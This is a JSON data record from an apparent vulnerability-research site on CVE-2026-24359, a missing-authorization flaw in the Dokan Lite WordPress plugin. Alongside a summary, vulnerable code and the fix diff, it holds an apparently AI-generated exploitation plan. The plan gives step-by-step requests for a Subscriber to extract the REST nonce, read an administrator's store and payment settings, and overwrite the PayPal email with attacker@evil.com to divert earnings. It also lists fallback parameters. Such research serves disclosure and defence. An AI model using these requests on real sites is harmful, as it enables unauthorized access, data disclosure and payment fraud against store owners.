[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fmmiYP0KHZfQ6a-Zsbt6zHeyHCp5X-IqtpF8DpRw7kMc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-24359","dokan-ai-powered-woocommerce-multivendor-marketplace-solution-build-your-own-amazon-ebay-etsy-missing-authorization","Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy \u003C= 4.2.4 - Missing Authorization","The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","dokan-lite",null,"\u003C=4.2.4","4.2.5","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-16 00:00:00","2026-03-27 21:14:26",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb56abce9-82f8-4d73-bf97-cb1e2b65515b?source=api-prod",12,[22,23,24,25,26,27,28,29],"assets\u002Fjs\u002Fcore-store.asset.php","assets\u002Fjs\u002Fcore-store.js","assets\u002Fjs\u002Fstore-performance.js","dokan-class.php","dokan.php","includes\u002FDependencyManagement\u002FProviders\u002FCommonServiceProvider.php","includes\u002FREST\u002FStoreController.php","includes\u002FREST\u002FStoreSettingController.php","researched",false,3,"# Detailed Exploitation Research Plan: CVE-2026-24359\n\n## 1. Vulnerability Summary\nThe **Dokan Lite** plugin (up to version 4.2.4) contains a missing authorization vulnerability (IDOR) within its REST API `settings` endpoint. The `WeDevs\\Dokan\\REST\\StoreSettingController` class defines routes for retrieving and updating store settings. While it implements a `permission_callback`, the callback only verifies that the current requester is a logged-in user and that a \"vendor\" (user) exists for the provided ID. It fails to verify if the requester has permission to modify the specific vendor's settings.\n\nThis allow any authenticated user (e.g., a Subscriber) to view or modify the store settings (including PayPal\u002FBank payment details, store name, and address) of any other vendor or administrator on the site by specifying a `vendor_id` parameter.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings`\n- **Method**: `GET` (for information disclosure) and `POST`\u002F`PUT`\u002F`PATCH` (for unauthorized modification).\n- **Vulnerable Parameter**: `vendor_id` (Query parameter).\n- **Authentication**: Required (Subscriber level or higher).\n- **Required Header**: `X-WP-Nonce` (standard WordPress REST API nonce).\n\n## 3. Code Flow\n1.  **Registration**: In `includes\u002FREST\u002FStoreSettingController.php`, the `register_routes()` method registers the `\u002Fsettings` endpoint. Both `READABLE` and `EDITABLE` methods use `get_settings_permission_callback` as the `permission_callback`.\n2.  **Permission Check**: The `get_settings_permission_callback()` (line 144) calls `$this->get_vendor()`.\n3.  **Vendor Retrieval (Flawed)**: The `get_vendor($request = null)` method (line 164) prioritizes a `vendor_id` parameter from the request. If `vendor_id` is provided, it fetches that user. If not, it uses the current user ID.\n4.  **Authorization Failure**:\n    - During the `permission_callback`, the request object is typically passed but not explicitly used in the signature. The call `$this->get_vendor()` (no args) inside the callback defaults to the **current user**. Since the current user is logged in, they are considered a valid \"vendor\" by Dokan, and the check returns `true`.\n    - During the actual action (e.g., `update_settings`), the controller calls `$this->get_vendor( $request )` (line 111). This time, it processes the `vendor_id` query parameter, shifting the context to the **target user**.\n5.  **Execution**: `update_settings` calls `dokan()->vendor->update( $target_vendor_id, $params )`, modifying the target user's metadata without verifying the relationship between the requester and the target.\n\n## 4. Nonce Acquisition Strategy\nThe endpoint is a standard WordPress REST API route. To interact with it while authenticated via cookies, a `wp_rest` nonce is required.\n\n1.  **Identify Enqueue**: Dokan's core scripts (like `core-store.js`) use `wp-api-fetch`. These scripts are typically enqueued on the WordPress Dashboard or Dokan Vendor Dashboard.\n2.  **Creation**: No special shortcode is required as standard WordPress functionality enqueues the REST nonce for logged-in users in the admin area.\n3.  **Extraction**:\n    - Login as a Subscriber.\n    - Navigate to `\u002Fwp-admin\u002F`.\n    - Use `browser_eval` to extract the nonce from the global `wpApiSettings` object.\n    - **JS Command**: `window.wpApiSettings?.nonce`\n\n## 5. Exploitation Strategy\n\n### Step 1: Information Disclosure (Optional but useful)\nRetrieve sensitive settings (e.g., payment email) of the Administrator (usually ID 1).\n- **Request Tool**: `http_request`\n- **Method**: `GET`\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?vendor_id=1`\n- **Headers**: \n    - `X-WP-Nonce: [EXTRACTED_NONCE]`\n- **Expected Response**: JSON object containing the administrator's store settings, social links, and payment method info.\n\n### Step 2: Unauthorized Modification\nChange the store name or payment email of the Administrator.\n- **Request Tool**: `http_request`\n- **Method**: `POST`\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?vendor_id=1`\n- **Headers**:\n    - `Content-Type: application\u002Fjson`\n    - `X-WP-Nonce: [EXTRACTED_NONCE]`\n- **Body**:\n    ```json\n    {\n        \"store_name\": \"Hacked by Subscriber\",\n        \"social\": {\n            \"fb\": \"https:\u002F\u002Ffacebook.com\u002Fattacker\"\n        },\n        \"payment\": {\n            \"paypal\": {\n                \"email\": \"attacker@evil.com\"\n            }\n        }\n    }\n    ```\n\n## 6. Test Data Setup\n1.  **Target**: Ensure an Administrator user exists (User ID 1).\n2.  **Attacker**: Create a user with the `subscriber` role.\n3.  **Dokan Setup**: Ensure Dokan Lite is active. The plugin automatically treats users as \"vendors\" for the purpose of the `settings` endpoint.\n\n## 7. Expected Results\n- The `GET` request should return a `200 OK` with a JSON payload containing details that a Subscriber should not see for another user.\n- The `POST` request should return a `200 OK` and a response body mirroring the updated data.\n- The database state for the target user (ID 1) should reflect the injected values.\n\n## 8. Verification Steps\nAfter performing the `POST` request, verify the change using WP-CLI:\n```bash\n# Check the target user's dokan_profile_settings meta\nwp user meta get 1 dokan_profile_settings\n```\nExpected output: The `store_name` should be \"Hacked by Subscriber\" and the PayPal email should be updated.\n\n## 9. Alternative Approaches\nIf `vendor_id` is not accepted as a query parameter in some environments, try including it in the JSON body:\n```json\n{\n    \"vendor_id\": 1,\n    \"store_name\": \"Hacked via Body Param\"\n}\n```\nIf the `wpApiSettings` object is missing, the nonce can be found by searching the HTML source for `\"nonce\":\"...\"` within the script tags or by checking the `X-WP-Nonce` header in any network request made by the WordPress dashboard.","The Dokan Lite plugin for WordPress is vulnerable to an Insecure Direct Object Reference (IDOR) via the REST API \u002Fsettings endpoint. Authenticated attackers, including those with Subscriber-level access, can view or modify the store settings (such as PayPal email addresses and store names) of any other vendor or administrator by providing a target user ID in the 'vendor_id' parameter.","\u002F\u002F includes\u002FREST\u002FStoreSettingController.php lines 35-71\npublic function register_routes() {\n    register_rest_route(\n        $this->namespace,\n        '\u002F' . $this->rest_base,\n        [\n            [\n                'methods'             => WP_REST_Server::READABLE,\n                'callback'            => [ $this, 'get_settings' ],\n                'permission_callback' => [ $this, 'get_settings_permission_callback' ],\n                'args'                => [\n                    'vendor_id' => [\n                        'required'          => false,\n                        'type'              => 'integer',\n                        'validate_callback' => function ( $param ) {\n                            return is_numeric( $param ) && (int) $param > 0;\n                        },\n                        'description'       => __( 'Optional vendor ID', 'dokan-lite' ),\n                    ],\n                ],\n            ],\n            [\n                'methods'             => WP_REST_Server::EDITABLE,\n                'callback'            => [ $this, 'update_settings' ],\n                'permission_callback' => [ $this, 'get_settings_permission_callback' ],\n                'args'                => [\n                    'vendor_id' => [\n                        'required'          => false,\n                        'type'              => 'integer',\n                        'validate_callback' => function ( $param ) {\n                            return is_numeric( $param ) && (int) $param > 0;\n                        },\n                        'description'       => __( 'Optional vendor ID', 'dokan-lite' ),\n                    ],\n                ],\n            ],\n        ]\n    );\n}\n\n---\n\n\u002F\u002F includes\u002FREST\u002FStoreSettingController.php lines 124-138\npublic function get_settings_permission_callback() {\n    $vendor = $this->get_vendor();\n\n    if ( is_wp_error( $vendor ) ) {\n        return $vendor;\n    }\n\n    if ( empty( $vendor->get_id() ) ) {\n        return new WP_Error( 'no_store_found', __( 'No vendor found', 'dokan-lite' ), [ 'status' => 404 ] );\n    }\n\n    return true;\n}\n\n---\n\n\u002F\u002F includes\u002FREST\u002FStoreSettingController.php lines 147-166\nprotected function get_vendor( $request = null ) {\n    $vendor_id = is_a( $request, \\WP_REST_Request::class ) && $request->get_param( 'vendor_id' ) ? $request->get_param( 'vendor_id' ) : '';\n    if ( $vendor_id ) {\n        $vendor = dokan()->vendor->get( (int) $vendor_id );\n    } else {\n        $current_user = dokan_get_current_user_id();\n\n        if ( ! $current_user ) {\n            return new WP_Error( 'Unauthorized', __( 'You are not logged in', 'dokan-lite' ), [ 'code' => 401 ] );\n        }\n\n        if ( $current_user ) {\n            $vendor = dokan()->vendor->get( $current_user );\n        }\n    }\n\n    return $vendor;\n}","--- a\u002Fincludes\u002FREST\u002FStoreSettingController.php\n+++ b\u002Fincludes\u002FREST\u002FStoreSettingController.php\n@@ -124,8 +124,8 @@\n      *\n      * @return bool|WP_Error\n      *\u002F\n-    public function get_settings_permission_callback() {\n-        $vendor = $this->get_vendor();\n+    public function get_settings_permission_callback( $request ) {\n+        $vendor = $this->get_vendor( $request );\n \n         if ( is_wp_error( $vendor ) ) {\n             return $vendor;\n@@ -135,6 +135,10 @@\n             return new WP_Error( 'no_store_found', __( 'No vendor found', 'dokan-lite' ), [ 'status' => 404 ] );\n         }\n \n+        if ( ! current_user_can( 'manage_options' ) && dokan_get_current_user_id() !== $vendor->get_id() ) {\n+            return new WP_Error( 'dokan_rest_cannot_view', __( 'Sorry, you are not allowed to view or edit these settings.', 'dokan-lite' ), [ 'status' => rest_authorization_required_code() ] );\n+        }\n+\n         return true;\n     }","1. Authenticate to the WordPress site as a low-privileged user (e.g., Subscriber).\n2. Obtain a valid REST API nonce (X-WP-Nonce) from the dashboard's HTML source or global JS objects (window.wpApiSettings.nonce).\n3. To disclose sensitive store data of another user (e.g., the Administrator with ID 1), send a GET request to `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?vendor_id=1` with the nonce header.\n4. To modify the target's settings, send a POST\u002FPUT request to `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?vendor_id=1` with a JSON payload containing fields to change, such as 'payment' -> 'paypal' -> 'email' to redirect vendor earnings to the attacker's account.","gemini-3-flash-preview","2026-04-18 03:34:10","2026-04-18 03:34:47",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.2.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags\u002F4.2.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdokan-lite.4.2.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags\u002F4.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdokan-lite.4.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags"]